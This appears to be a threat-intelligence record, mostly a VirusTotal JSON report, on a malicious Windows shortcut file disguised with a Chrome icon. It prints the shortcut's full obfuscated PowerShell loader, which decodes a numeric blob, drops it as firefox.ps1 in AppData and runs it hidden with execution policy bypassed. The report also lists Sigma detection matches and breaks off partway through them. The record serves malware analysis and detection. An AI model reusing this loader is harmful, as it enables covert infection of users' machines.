5577fffb5b5acd3771ef9dc696498f1e
Hash
- MD5: 5577fffb5b5acd3771ef9dc696498f1e
- SHA1: 96f7e28184e2e08fae0b76175d813346f9e24db3
- SHA256: 863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1
- First Seen: 2026-04-03
- Last Seen: 2026-04-03
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1"
},
"attributes": {
"sigma_analysis_stats": {
"critical": 0,
"high": 4,
"medium": 3,
"low": 3
},
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"times_submitted": 3,
"last_modification_date": 1776247118,
"size": 988116,
"tags": [
"large-file",
"long-command-line-arguments",
"lnk",
"abused-exe-pattern",
"executes-dropped-file",
"detect-debug-environment",
"hiding-window"
],
"last_analysis_stats": {
"malicious": 32,
"suspicious": 0,
"undetected": 28,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 3,
"type-unsupported": 13
},
"md5": "5577fffb5b5acd3771ef9dc696498f1e",
"magika": "LNK",
"sha1": "96f7e28184e2e08fae0b76175d813346f9e24db3",
"sha256": "863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1",
"type_tag": "lnk",
"first_submission_date": 1774511404,
"reputation": 0,
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": " \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 37 112 155 150 130 103 29 57 104 104 96 121 107 29 37 165 172 167 169 170 236 157 25 236 74 61 236 151 176 173 236 50 57 234 184 176 236 79 68 234 28 156 236 73 57 162 89 104 43 107 146 177 105 85 88 29 25 173 152 176 167 100 29 25 171 170 174 89 89 87 94 171 170 174 154 101 40 107 162 179 92 93 170 102 107 108 115 162 102 170 102 107 94 104 174 142 168 48 25 98 106 101 169 143 113 107 102 105 96 104 88 100 68 99 110 99 80 122 76 42 138 115 120 83 135 93 34 131 125 111 133 135 44 54 128 159 131 120 92 27 62 99 144 133 101 120 33 26 126 145 119 149 126 80 85 159 165 159 155 155 90 92 151 116 105 86 82 93 107 146 181 172 89 90 34 35 104 114 92 128 104 113 80 173 179 111 87 97 40 33 104 99 163 98 90 34 24 93 166 111 85 170 86 105 107 99 111 91 105 41 63 108 104 107 169 143 113 107 96 116 103 91 170 86 109 169 111 103 93 103 65 44 89 109 176 140 172 111 41 94 114 88 155 92 45 39 171 154 172 101 85 37 33 97 105 176 140 172 111 105 102 97 92 85 88 98 44 93 108 161 83 152 98 29 91 102 102 100 105 29 26 158 177 168 110 87 31 36 112 155 150 132 89 46 44 93 112 140 104 88 48 58 89 99 103 91 101 105 105 93 99 97 95 103 46 25 132 113 167 160 157 31 40 93 102 93 96 88 34 27 84 166 106 96 96 44 26 158 177 168 110 87 31 36 112 155 150 132 89 46 44 93 112 140 104 88 48 58 89 99 103 91 101 105 105 103 108 100 100 124 48 25 101 172 167 154 90 48 22 142 99 107 99 143 109 43 91 116 98 102 100 67 44 96 112 174 142 172 109 44 102 112 98 85 143 105 107 128 102 86 96 96 37 44 158 160 162 153 170 101 107 165 126 103 91 104 34 22 90 179 164 167 172 67 57 173 164 160 155 156 86 109 118 108 98 167 160 111 87 153 154 176 81 150 93 100 171 169 174 136 92 33 33 104 126 107 167 160 111 43 130 108 92 154 151 94 86 159 162 154 167 160 111 101 130 141 124 124 128 101 33 100 106 107 169 133 44 42 98 102 167 167 160 111 74 101 99 174 157 170 34 32 104 179 164 167 157 96 89 152 179 164 167 156 99 93 171 169 174 155 156 99 93 171 169 174 118 107 43 44 91 108 161 148 153 90 95 154 159 174 160 172 100 35 94 108 98 169 170 113 107 146 181 172 97 103 48 41 104 99 93 169 143 113 77 82 179 128 119 131 59 76 121 144 163 117 125 70 72 127 179 176 140 172 109 44 89 106 101 94 79 86 109 132 103 90 90 97 44 96 123 112 93 85 127 44 25 101 102 108 169 159 60 27 100 181 172 101 85 37 33 97 105 176 156 132 44 44 105 112 94 86 172 109 37 104 116 108 100 90 30 109 160 128 93 100 90 80 38 104 103 92 169 168 48 38 104 103 92 169 159 66 24 89 143 103 93 103 113 105 84 92 87 101 172 100 56 90 112 142 104 89 40 42 125 116 94 86 99 35 38 146 175 172 80 83 24 41 146 181 176 165 89 30 26 173 152 176 127 93 40 31 160 133 111 85 100 113 101 169 112 98 83 146 80 29 93 145 111 85 107 104 109 171 166 131 96 105 31 30 90 102 106 85 157 58 36 95 113 97 82 89 98 57 104 104 96 93 107 29 40 90 166 119 104 100 34 30 159 107 93 100 170 86 109 169 102 97 90 172 84 109 131 102 103 91 159 65 44 89 109 176 161 168 44 31 87 155 143 89 92 77 44 89 116 167 169 170 98 64 100 114 94 90 89 34 39 89 166 121 96 94 45 30 86 98 161 117 103 36 29 97 116 92 100 89 98 52 108 109 97 90 158 31 25 103 179 149 169 168 23 30 94 112 176 140 172 111 52 108 109 97 90 158 31 25 103 179 149 165 103 31 43 130 138 135 169 143 113 107 169 110 92 85 88 29 94 108 101 103 154 86 93 94 93 99 97 95 103 46 25 90 166 172 161 113 28 27 100 120 150 143 135 30 42 108 101 107 133 107 29 44 122 97 94 96 94 42 101 169 101 94 90 98 44 42 89 140 108 160 163 98 27 104 101 97 86 99 29 30 91 92 161 99 99 37 40 90 166 172 161 113 28 27 100 120 150 143 135 30 42 108 101 107 133 107 29 44 122 97 94 96 94 42 101 169 91 97 90 103 104 100 158 99 111 82 141 31 40 103 152 172 103 90 48 31 106 109 130 104 95 44 107 146 181 135 91 86 34 34 104 168 121 100 106 63 40 92 96 107 86 88 113 96 120 99 103 169 168 44 27 107 138 133 128 172 100 69 104 116 108 100 90 30 109 169 109 107 104 104 44 27 90 181 163 116 89 44 27 140 110 107 91 88 113 105 108 110 107 91 88 113 96 126 96 92 131 99 37 40 173 177 97 90 93 113 96 120 98 107 135 107 30 36 106 133 111 87 89 40 31 102 154 176 87 103 35 44 96 112 163 96 88 44 32 173 168 96 104 88 41 109 169 102 97 90 172 100 31 104 94 98 104 95 44 109 169 98 93 86 145 113 109 169 101 96 89 172 84 109 131 102 103 91 159 65 44 89 109 176 161 168 44 31 87 155 143 89 92 77 44 89 116 167 169 170 98 64 100 114 94 90 89 34 39 89 166 121 96 94 45 30 86 98 161 134 96 34 24 105 130 92 90 90 44 94 103 116 109 100 106 34 30 98 167 96 86 155 111 82 173 177 93 85 90 113 80 173 174 172 104 96 40 26 144 149 168 167 95 34 27 84 130 92 167 160 111 85 148 157 174 157 170 77 40 91 108 90 100 170 104 82 169 104 93 140 159 39 30 100 103 176 161 170 68 40 171 169 172 104 96 40 26 114 165 115 157 170 31 40 108 104 174 160 145 109 27 103 152 163 95 93 40 31 165 179 126 99 105 95 107 161 177 111 93 99 30 50 156 120 164 165 107 37 36 90 122 158 108 160 111 75 84 97 107 86 170 104 82 169 98 92 87 143 81 101 169 104 93 157 170 31 20 93 97 97 167 160 109 27 103 169 176 167 103 30 64 108 103 111 98 170 101 109 171 99 107 104 170 104 82 169 99 107 89 143 81 101 171 104 93 81 170 101 107 91 93 174 157 170 63 71 137 147 174 157 170 36 44 95 110 174 157 172 111 39 103 179 167 142 168 45 40 103 181 147 169 170 28 26 100 103 105 169 121 24 26 89 112 99 142 87 30 36 95 110 176 118 83 30 25 104 104 162 128 125 86 24 90 108 98 98 172 62 20 90 97 107 92 158 62 40 106 96 94 96 88 24 95 138 99 88 98 90 48 29 101 92 149 89 87 47 33 100 114 176 102 96 48 26 90 181 135 91 99 29 18 93 96 110 93 99 46 109 90 97 111 85 99 46 109 139 92 92 100 113 52 109 137 112 109 161 138 24 25 104 122 115 169 99 35 75 84 97 107 86 160 30 25 91 108 98 98 172 33 22 105 172 85 92 89 25 109 100 104 147 91 103 26 109 96 98 88 161 99 35 75 84 97 107 86 163 86 75 84 97 107 110 111 113 26 144 103 107 82 172 79 20 89 112 117 150 154 52 82 100 103 92 169 96 44 31 144 108 99 155 122 44 44 105 173 93 157 156 101 26 159 137 107 91 101 29 37 164 154 103 99 164 37 40 95 180 147 86 158 69 40 95 110 92 97 163 22 27 104 97 91 87 94 113 31 88 105 100 142 79 79 20 89 112 117 108 172 46 43 129 112 98 140 94 44 22 173 147 87 85 103 54 89 112 154 103 92 158 63 40 108 113 168 102 106 69 40 95 169 160 157 152 104 82 123 143 140 135 172 33 43 98 152 98 100 85 113 59 135 145 142 161 92 26 41 161 98 167 142 138 24 25 104 122 115 169 97 44 20 144 101 110 94 158 74 40 89 147 87 85 103 30 101 154 163 167 142 138 24 25 104 122 115 169 99 27 80 93 115 101 155 133 44 25 139 92 92 100 89 105 92 151 172 149 136 95 48 31 102 112 108 169 95 48 80 95 112 89 169 139 36 44 95 110 107 101 164 104 82 132 146 94 81 120 31 44 95 98 106 90 90 36 109 137 112 109 140 95 48 95 138 111 106 85 103 77 40 106 99 88 87 164 38 40 84 169 103 83 163 86 74 91 93 125 85 102 43 32 173 114 93 140 94 44 22 173 146 94 81 121 29 39 103 104 168 96 95 101 73 104 114 164 153 163 86 32 90 93 176 90 95 84 31 104 94 176 92 89 25 101 164 154 109 86 158 78 30 93 92 124 90 164 34 32 164 154 97 92 158 77 36 90 101 97 86 103 105 100 146 99 107 85 87 31 31 173 102 99 155 120 34 76 91 99 111 80 164 104 82 80 88 174 142 168 40 80 157 154 172 104 143 109 36 162 177 111 87 101 30 50 156 120 149 165 92 84 107 101 102 97 89 170 86 105 90 152 144 161 170 87 107 161 179 93 143 170 104 82 169 99 147 165 92 113 96 91 112 96 93 107 46 40 173 179 97 167 160 111 25 171 154 106 90 90 44 44 106 109 168 165 99 29 40 96 181 103 91 172 109 27 104 101 167 78 168 45 40 103 152 172 101 103 43 109 160 99 107 89 96 48 42 104 181 172 96 88 44 32 161 177 93 85 90 54 105 100 120 149 165 99 102 98 146 88 143 101 104 100 57 84 101 107 169 159 61 20 93 112 140 100 102 40 31 100 97 103 90 94 113 105 105 112 106 142 168 33 22 105 181 147 169 170 70 36 129 137 128 146 89 30 106 171 154 172 100 103 44 109 144 181 134 90 99 35 96 125 116 92 97 172 105 105 104 103 90 143 139 33 29 137 116 92 104 163 113 107 95 112 89 86 158 33 26 156 179 149 165 101 29 25 89 97 176 140 172 111 37 89 97 96 86 146 98 94 102 108 92 93 107 47 95 106 102 99 167 145 109 44 89 106 101 94 172 84 109 171 110 100 89 107 29 96 132 107 105 92 83 63 72 106 146 110 113 86 76 89 98 139 120 104 136 76 40 118 136 154 124 123 33 23 126 107 139 126 104 61 29 90 134 140 112 152 67 76 149 167 160 152 158 96 86 156 159 111 98 89 23 89 171 154 172 89 90 34 35 104 114 92 128 104 113 80 173 179 111 87 97 40 33 104 99 163 98 90 34 24 93 166 111 85 170 86 105 107 99 111 91 105 41 63 108 104 107 169 143 113 107 96 116 103 91 170 86 105 103 108 100 100 124 48 25 101 181 147 169 170 30 42 108 105 100 155 88 25 25 171 154 172 101 85 37 33 97 105 176 140 172 111 105 102 97 92 85 88 98 44 93 108 161 83 152 98 29 91 102 102 100 105 29 26 158 177 168 110 87 31 36 112 155 150 132 89 46 44 93 112 140 104 88 48 58 89 99 103 91 101 105 105 93 99 97 95 103 46 25 132 113 167 160 157 31 40 93 102 93 96 88 34 27 84 166 106 96 96 44 26 158 177 168 110 87 31 36 112 155 150 132 89 46 44 93 112 140 104 88 48 58 89 99 103 91 101 105 105 103 108 100 100 124 48 25 101 172 167 154 90 48 22 142 99 107 99 143 109 43 91 116 98 102 100 67 44 96 112 174 142 168 48 38 104 103 92 140 164 111 64 94 91 103 93 96 48 94 152 167 160 167 160 111 101 118 108 98 101 93 26 26 171 169 174 169 126 61 109 156 165 162 153 145 113 54 100 103 174 157 170 91 89 146 181 88 147 152 104 107 161 179 143 89 92 37 40 118 112 174 157 170 47 66 100 97 161 148 153 90 95 154 159 174 157 170 105 66 133 129 131 125 160 37 36 98 112 176 130 103 46 34 94 172 174 157 170 78 37 91 179 164 167 93 36 40 171 169 174 154 155 93 88 171 169 174 153 158 97 107 161 179 162 153 158 97 107 161 179 125 104 102 48 27 100 166 155 150 149 99 90 151 179 167 169 159 39 30 100 103 176 167 172 111 82 169 109 107 104 104 44 27 90 181 147 169 140 22 107 125 131 135 115 139 61 72 160 129 129 126 135 67 107 173 152 176 165 107 29 34 98 106 83 142 168 31 40 90 101 97 91 89 44 109 144 181 135 91 86 34 34 104 168 121 100 106 63 40 92 96 107 86 88 113 96 120 99 103 169 168 45 22 97 105 100 93 172 100 69 104 116 108 100 90 30 109 169 109 107 104 104 44 27 90 181 163 116 89 44 27 140 110 107 91 88 113 105 108 110 107 91 88 113 96 120 98 107 135 107 30 36 106 133 111 87 89 40 31 102 154 117 135 83 29 40 114 120 115 165 106 24 25 104 98 176 140 172 109 27 104 98 96 90 94 30 40 159 146 97 91 88 44 31 89 154 117 135 83 29 40 114 120 115 165 104 44 42 107 92 92 100 89 84 50 132 103 103 85 111 87 83 137 112 109 161 168 47 20 89 112 93 157 168 33 22 105 172 149 110 121 24 26 89 112 99 155 120 44 21 89 167 139 91 105 34 41 100 103 105 108 146 87 76 122 146 135 128 158 74 40 89 130 92 87 99 35 38 165 177 108 100 105 47 20 89 112 93 160 80 113 62 88 97 163 131 99 37 40 173 168 138 96 96 44 61 108 97 104 169 168 44 40 104 181 163 132 94 46 30 105 108 98 98 172 28 25 103 157 149 118 88 48 27 89 168 128 87 93 46 40 90 98 176 89 93 26 40 91 98 104 100 96 37 109 160 148 94 98 87 36 40 95 97 132 96 89 29 109 171 168 130 90 124 31 30 103 108 100 100 172 100 72 85 112 109 84 88 40 30 95 133 97 93 99 46 20 173 147 87 89 107 30 26 173 168 138 96 96 44 109 169 112 107 100 170 113 96 118 108 98 101 93 26 58 89 92 100 100 172 73 36 105 113 107 91 145 106 82 173 177 93 85 90 113 17 173 134 91 85 159 75 36 97 112 176 156 134 40 33 104 133 111 85 100 113 105 93 101 96 169 159 76 31 106 102 108 96 94 42 109 120 129 138 145 145 113 105 108 114 92 96 93 35 109 144 181 130 100 85 100 58 106 109 107 101 87 37 40 105 129 111 86 97 80 42 89 108 97 91 172 100 72 85 112 109 84 88 44 109 171 94 93 102 90 40 29 89 167 107 81 103 111 109 160 148 94 98 87 36 40 95 97 176 167 157 98 43 173 166 161 91 93 37 30 102 102 176 105 170 109 26 90 98 112 167 170 86 109 169 97 94 96 101 42 40 91 181 147 169 126 44 22 160 130 109 97 103 45 24 97 112 108 117 107 30 34 121 99 103 98 101 44 27 173 168 129 91 105 44 109 160 148 92 169 164 74 40 89 168 140 104 88 44 100 159 148 108 101 127 40 31 88 97 107 86 164 96 93 164 181 163 119 103 33 40 89 108 92 96 93 35 68 95 97 107 87 86 48 33 173 173 130 100 85 100 57 100 104 107 118 92 48 31 173 168 131 96 94 28 25 104 98 176 150 151 104 82 173 177 93 100 88 29 36 95 110 93 169 143 113 63 104 94 163 118 105 41 40 105 96 100 100 104 61 44 90 106 125 100 88 29 36 95 110 93 118 103 29 109 160 141 103 101 104 44 31 146 181 126 100 101 40 26 89 112 94 156 121 46 37 104 113 91 93 103 45 57 108 98 101 169 159 61 44 90 106 130 104 95 44 109 171 136 103 102 90 34 26 94 111 92 132 104 42 40 120 101 108 104 88 44 57 108 98 101 124 107 46 37 100 103 107 130 133 30 22 91 90 138 147 156 95 84 154 159 157 151 159 94 88 123 168 156 136 154 75 96 148 159 143 145 159 97 90 138 162 139 134 136 91 84 154 111 155 76 170 113 96 140 114 92 96 93 35 109 169 116 109 85 99 34 31 173 168 124 87 99 42 38 104 99 176 165 88 31 36 102 110 107 87 172 100 58 104 97 92 96 94 42 26 173 177 93 100 88 29 36 95 110 93 142 172 109 40 104 112 176 140 172 71 30 100 103 163 121 107 29 37 173 173 172 100 94 27 83 140 101 96 133 107 29 44 164 181 174 91 103 26 26 159 101 93 152 170 86 109 173 177 111 93 99 30 80 141 173 174 92 93 31 20 122 97 174 157 170 89 84 149 179 164 167 136 44 27 100 95 107 167 163 86 105 96 98 147 156 98 34 36 95 181 168 167 127 44 107 161 177 111 93 99 30 50 157 120 164 167 90 44 44 96 179 167 142 168 31 39 144 168 102 90 99 35 101 171 131 106 102 154 111 97 169 116 100 96 89 54 92 112 169 172 104 96 40 26 114 163 115 157 170 79 20 89 112 93 167 163 86 105 90 97 94 140 140 105 105 96 98 164 167 90 24 29 89 102 174 157 168 31 39 161 181 174 100 89 68 44 95 116 105 167 160 113 107 91 112 111 167 163 86 105 91 112 96 140 140 105 107 96 98 88 167 160 111 27 85 179 164 167 122 75 73 139 179 164 167 95 48 31 102 179 164 169 170 43 39 171 172 149 165 104 44 39 173 152 176 167 87 30 36 95 110 176 118 83 30 25 104 104 149 84 89 40 31 102 181 125 80 89 29 40 96 167 135 122 145 28 26 100 103 105 169 121 24 26 89 112 99 155 121 44 42 88 99 103 85 83 99 74 91 93 105 87 107 33 37 84 154 96 84 106 37 36 106 181 109 93 107 30 26 173 140 98 96 88 22 29 88 115 100 96 105 113 26 89 116 92 96 105 113 75 84 97 107 110 111 113 73 104 114 168 135 83 29 40 114 120 176 96 94 79 20 89 112 93 157 89 29 27 100 103 105 169 92 26 41 164 90 99 86 84 113 36 96 152 98 100 85 113 32 90 93 168 96 94 79 20 89 112 93 160 145 79 20 89 112 117 108 172 30 80 95 112 89 169 138 24 25 104 122 157 151 111 86 36 95 97 176 93 103 35 80 100 104 162 119 103 48 41 165 98 164 153 160 30 95 129 112 98 98 88 41 100 146 108 106 161 96 44 31 172 152 93 155 128 44 31 102 97 104 160 81 31 40 89 96 94 91 172 35 24 97 105 149 76 138 24 25 104 122 115 169 105 47 65 104 103 147 91 103 26 109 139 92 92 100 113 93 48 146 108 99 155 122 44 44 105 173 109 103 128 44 31 161 165 164 149 163 86 59 135 145 142 169 92 47 34 144 103 107 82 172 63 71 137 147 168 89 85 45 97 90 172 149 135 83 29 40 114 120 176 94 103 24 80 93 115 101 155 133 44 25 139 92 92 100 89 105 90 155 172 149 135 83 29 40 114 120 176 96 86 84 29 107 106 162 130 103 29 75 84 97 107 86 164 96 87 164 154 143 92 107 35 38 104 113 176 92 107 84 31 104 94 176 136 95 48 31 102 112 108 161 163 86 68 138 99 88 117 90 48 31 90 111 97 87 95 113 73 104 114 147 92 107 99 74 103 111 92 100 136 44 42 91 93 94 161 97 44 20 161 108 90 160 145 78 27 85 130 92 99 102 36 109 106 98 147 91 103 26 109 138 99 88 118 88 43 39 96 173 103 92 160 77 40 106 169 160 160 145 36 26 85 181 97 92 143 35 40 86 181 99 86 84 105 100 146 114 93 155 137 34 29 84 129 97 161 93 36 100 146 102 99 155 136 40 26 93 102 93 100 164 104 82 91 112 92 84 90 35 109 94 104 162 117 93 80 27 91 116 87 161 163 86 16 80 179 149 165 99 84 93 146 177 111 140 168 40 98 169 116 94 98 89 54 92 112 154 172 89 143 111 37 94 102 96 167 145 109 26 144 149 168 167 146 111 97 171 98 150 167 163 86 105 91 152 172 89 172 100 27 104 101 100 104 105 44 109 171 102 174 157 170 29 107 146 111 97 87 103 48 42 101 173 172 96 88 44 32 173 108 98 169 168 31 40 93 172 85 165 104 44 39 144 177 108 100 102 113 96 91 112 96 93 107 46 40 173 177 103 85 103 36 97 169 98 92 87 113 109 36 112 154 172 96 161 102 82 80 148 108 101 159 61 20 93 112 176 156 120 24 29 104 145 107 99 99 35 36 89 108 97 91 172 109 41 104 111 149 165 92 26 41 173 152 176 167 129 40 65 129 133 153 86 89 110 107 146 177 106 89 92 33 109 144 181 174 104 98 34 43 106 116 100 93 158 29 21 89 179 149 165 104 26 33 97 105 100 152 172 84 109 171 177 105 85 88 29 25 158 116 96 96 157 27 89 158 101 94 90 98 44 42 89 98 161 165 164 54 24 91 108 115 143 146 76 26 106 116 96 100 136 48 25 108 130 92 87 99 35 38 165 177 96 87 93 39 40 106 97 135 101 163 104 94 91 112 96 90 89 40 25 94 99 87 154 102 40 33 104 98 161 165 164 54 24 91 108 115 143 146 76 26 106 116 96 100 136 48 25 108 130 92 87 99 35 38 165 177 106 89 92 33 100 164 166 94 104 85 82 27 104 111 147 165 106 31 44 95 114 104 123 107 36 40 171 154 172 87 103 30 29 94 103 93 100 172 84 109 132 103 90 90 97 44 96 118 112 110 119 103 32 24 104 98 92 169 159 60 27 100 181 172 101 85 37 33 97 105 159 169 159 73 40 108 113 107 87 89 113 105 101 112 111 101 103 31 26 173 168 123 86 103 31 76 102 112 98 85 172 109 44 102 112 98 85 172 100 56 90 112 142 104 89 40 42 125 116 94 86 99 35 38 146 122 142 80 88 44 50 112 120 172 103 83 29 40 90 181 147 169 168 31 40 90 101 97 91 89 44 95 138 102 98 85 103 35 25 146 122 142 80 88 44 50 112 120 172 101 103 46 43 84 97 107 86 143 54 68 95 108 92 108 146 87 73 104 114 168 165 106 24 25 104 98 164 165 92 26 41 164 154 117 118 83 30 25 104 104 162 117 103 25 25 159 144 98 102 93 45 36 95 110 115 143 146 80 58 138 140 135 155 133 44 25 122 97 94 96 94 42 101 169 113 107 102 106 24 25 104 98 167 77 172 66 24 89 168 138 96 96 44 109 160 143 103 93 103 65 44 89 109 176 165 103 44 40 173 168 139 91 105 34 41 100 103 105 169 87 29 39 149 154 125 85 107 31 25 160 133 94 90 105 44 26 90 181 96 90 85 44 27 90 109 107 93 96 113 96 140 99 105 84 95 44 31 89 137 103 86 88 113 107 160 135 97 121 90 34 39 100 105 107 169 159 76 21 104 114 91 85 99 34 31 125 102 100 96 105 24 109 139 92 96 104 89 30 109 160 143 103 93 103 113 105 104 112 107 167 172 100 54 100 103 108 90 85 62 25 84 105 107 169 132 40 41 105 112 98 142 172 113 109 169 111 96 89 92 113 80 173 179 111 95 93 47 42 108 105 100 155 88 25 25 171 154 172 101 85 37 33 97 105 159 169 143 113 107 169 110 92 85 88 29 94 108 101 103 154 86 93 94 93 99 97 95 103 46 25 90 166 172 161 113 28 27 100 120 150 143 135 30 42 108 101 107 133 107 29 44 122 97 94 96 94 42 101 169 101 94 90 98 44 42 89 140 108 160 163 98 27 104 101 97 86 99 29 30 91 92 161 99 99 37 40 90 166 172 161 113 28 27 100 120 150 143 135 30 42 108 101 107 133 107 29 44 122 97 94 96 94 42 101 169 111 96 89 92 104 100 158 99 111 82 141 31 40 103 152 172 103 90 48 31 106 109 130 104 95 44 107 146 181 135 91 86 34 34 104 168 121 100 106 63 40 92 96 107 86 88 113 96 120 99 103 169 168 45 22 97 105 100 93 155 113 96 133 112 111 101 103 31 26 173 177 104 100 107 45 40 91 98 176 156 119 30 40 91 148 105 100 94 29 109 169 116 105 100 94 29 109 160 134 91 85 134 40 33 104 181 172 100 103 44 109 160 128 93 100 138 48 26 100 114 128 104 90 30 36 95 110 149 118 88 48 27 89 168 128 87 93 46 40 90 98 176 89 93 26 40 91 98 104 100 96 37 109 160 148 94 98 87 36 40 95 97 132 96 89 29 109 171 168 130 90 124 31 30 103 108 100 100 172 100 72 85 112 109 84 88 40 30 95 133 97 93 99 46 20 173 147 87 89 107 30 26 173 168 138 96 96 44 109 169 112 107 100 170 113 96 118 108 98 101 93 26 58 89 92 100 100 172 73 36 105 113 107 91 145 113 109 123 112 99 90 86 44 96 132 97 107 92 172 100 61 108 97 104 169 168 68 20 132 103 90 90 105 48 25 100 102 98 155 127 24 74 94 104 99 104 94 45 95 125 116 92 97 172 100 71 94 99 109 100 145\\\";$Length = $VIUSBvejbawf.Length;$CLOIJSfgiojvosef235sdb = New-Object System.Collections.ArrayList;[string] $date = $null;$m = 0;for($k = 0; $k -lt $Length; $k++){$date += $VIUSBvejbawf[$k];if($VIUSBvejbawf[$k] -eq \\\" \\\"){[void]$CLOIJSfgiojvosef235sdb.Add([byte] $date);$m++;$date = $null;continue;}}$Apkengsidefg = \\\"be*&fni\\\";[Byte[]]$pw = [System.Text.Encoding]::UTF8.GetBytes(\\\"$Apkengsidefg\\\");\r\n$pw_Length = $Apkengsidefg.Length;$MFibvfaibfeg2345fbdfg = New-Object System.Byte[]($CLOIJSfgiojvosef235sdb.Count);$j = 0;for($i = 0; $i -lt $CLOIJSfgiojvosef235sdb.Count; $i++){$pw_num = $pw[$j] + 103;if($pw_num -ge $CLOIJSfgiojvosef235sdb[$i]){$MFibvfaibfeg2345fbdfg[$i] = $pw_num - $CLOIJSfgiojvosef235sdb[$i];}else{$MFibvfaibfeg2345fbdfg[$i] = $CLOIJSfgiojvosef235sdb[$i];}$j++;if($j -eq $pw_Length){$j = 0;}}$qqpvm = [System.Text.Encoding]::UTF8.GetString($MFibvfaibfeg2345fbdfg);$fgfw98JHGVfeg = \\\"$env:appdata\\firefox.ps1\\\";$qqpvm|Out-File -FilePath $fgfw98JHGVfeg;powershell -windowstyle hidden -ExecutionPolicy Bypass $fgfw98JHGVfeg;\"\r\n",
"icon_location": "%ProgramFiles%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "76e8bb8877ab40bd84b14fc93daffe9ff7ebe9440ce09916b5c63a302d62c918",
"rule_source": "Joe Security Rule Set (GitHub)",
"rule_title": "Dot net compiler compiles file from suspicious location",
"rule_description": "Dot net compiler compiles file from suspicious location",
"rule_author": "Joe Security",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"Description": "Visual C# Command Line Compiler",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\flwg3nkw\\flwg3nkw.cmdline\"",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\<USER>\\AppData\\Local\\Temp\\i3ogpj35\\i3ogpj35.cmdline",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "b0e07fc365ce0d0690c84a20e3467a5be2301d1c4de1e87bcbb9cb9ea841222c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Csc.EXE Execution Form Potentially Suspicious Parent",
"rule_description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Product": "Microsoft\\xae .NET Framework",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\flwg3nkw\\flwg3nkw.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
